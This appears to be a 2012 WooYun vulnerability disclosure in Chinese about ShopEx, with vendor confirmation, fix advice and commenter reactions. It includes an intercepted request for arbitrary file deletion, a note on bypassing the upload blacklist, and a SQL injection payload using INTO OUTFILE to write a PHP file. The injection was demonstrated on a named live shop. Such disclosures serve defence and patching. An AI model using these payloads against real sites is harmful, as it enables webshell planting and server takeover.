当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-011247

漏洞标题:ShopEx前台SQL注射拿shell

相关厂商:ShopEx

漏洞作者: yy520

提交时间:2012-08-23 20:41

修复时间:2012-10-07 20:42

公开时间:2012-10-07 20:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-08-23: 细节已通知厂商并且等待厂商处理中
2012-08-23: 厂商已经确认,细节仅向厂商公开
2012-08-26: 细节向第三方安全合作伙伴开放
2012-10-17: 细节向核心白帽子及相关领域专家公开
2012-10-27: 细节向普通白帽子公开
2012-11-06: 细节向实习白帽子公开
2012-10-07: 细节向公众公开

简要描述:

我终于知道ShopEx是干嘛的了,蛮多店铺用的
比昨天拿shell的方法更为简单有效~
PS:前台拿shell & 后台拿shell & 后台任意文件夹删除

详细说明:

0x1 后台任意文件删除
在模板列表删除其他模板,用burp截包

GET /shopex/shopadmin/index.php?ctl=system/template&act=remove&p[0]=testacccc&_ajax=true&_ss=goods,setting,site,tools,sale HTTP/1.1
Host: 10.1.1.100
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.81 Safari/537.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Referer: http://10.1.1.100/shopex/shopadmin/index.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: *********************


将p[0]修改为相对于/themes的相对路径
0x2 后台拿shell

function check_file_name($file_name){
$black_list = array('asp'=>1,'jsp'=>1,'php'=>1,'php5'=>1);
if(!$black_list[$file_name]){
return true;
}
return false;
}


上传一个模板~ 里面添加一个test.php.sql
貌似你们没有听这位大哥的意见:
WooYun: shopEX商城后台,模板过滤不严,可成功上传木马
建议不要用黑名单~ 这很容易绕过


0x3 前台拿shell
演示站抽风了~ 我拿其典型案例做演示
需要的条件:
1.普通用户的权限 2.一个可读可写可执行的目录
http://www.ansels.cn/


发送给填入:

test' union select  CHAR(60, 63, 112, 104, 112, 32, 112, 104, 112, 105, 110, 102, 111, 40, 41, 59, 63, 62) into outfile '/usr/local/apache/htdocs/images/default/yy520.php'  #



昨天是用get提交参数,没法写文件~ 今天不同了~。~

漏洞证明:

test

修复方案:

我真的不知道该说什么了~
虽然说在前台没什么好利用的,顶多只能找一些XSS和SQL inject,但是也没必要到处都是注入把~ 在一开始就把魔术引号去掉,后面单靠addslashs和quote,结果出现了一大堆注入,我都不知到怎么修补了,厂商不要看到别人报一个,你就只修补这一个漏洞,类似的漏洞还有很多的啊~~积极一点嘛~~~~
我很想建议推掉重新code~ 但是好像不大可能,所以还是给点实际的建议: 在带入数据库查询的之前,添加一个类似80sec的sql ids的东西,虽然不能完全避免注入,起码增加了注入难度。恩~ 希望shopex 下次能够更新得更为安全,起码能给挖漏洞的人增加一点乐趣 :)

版权声明:转载请注明来源 yy520@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2012-08-23 21:15

厂商回复:

感谢您为shopex安全做的贡献
我们会尽快处理
非常感谢

最新状态:

暂无


漏洞评价:

评论

  1. 2012-08-23 20:43 | 风萧萧 认证白帽子 ( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)

    高人!!!!!

  2. 2012-08-23 21:27 | 0gucci ( 普通白帽子 | Rank:166 漏洞数:33 | 深度值得深入)

    0 0#前台。。。。意思就是任意用户不需要登陆不需要其他权限了

  3. 2012-08-23 23:19 | Metasploit ( 实习白帽子 | Rank:37 漏洞数:7 | http://www.metasploit.cn/)

    。。。。。。。。。只能膜拜

  4. 2012-08-26 12:15 | 小痞子 ( 普通白帽子 | Rank:106 漏洞数:21 | <xss>alert("a")</xss>¥&@&……dssKhwjcw...)

    大神!!!!

  5. 2012-09-03 14:38 | enter ( 路人 | Rank:22 漏洞数:4 | 127.0.0.1)

    期待ing....这个影响很大

  6. 2012-09-25 11:55 | 神刀 ( 路人 | Rank:23 漏洞数:3 | www.shellsec.com内射那么牛,虾米没妹子?)

    。。。。。。。。。只能膜拜

  7. 2012-10-08 01:26 | 小威 ( 普通白帽子 | Rank:492 漏洞数:76 | 活到老,学到老!)

    真个真心碉堡 但是前台拿shell 貌似不咋给力 测试没过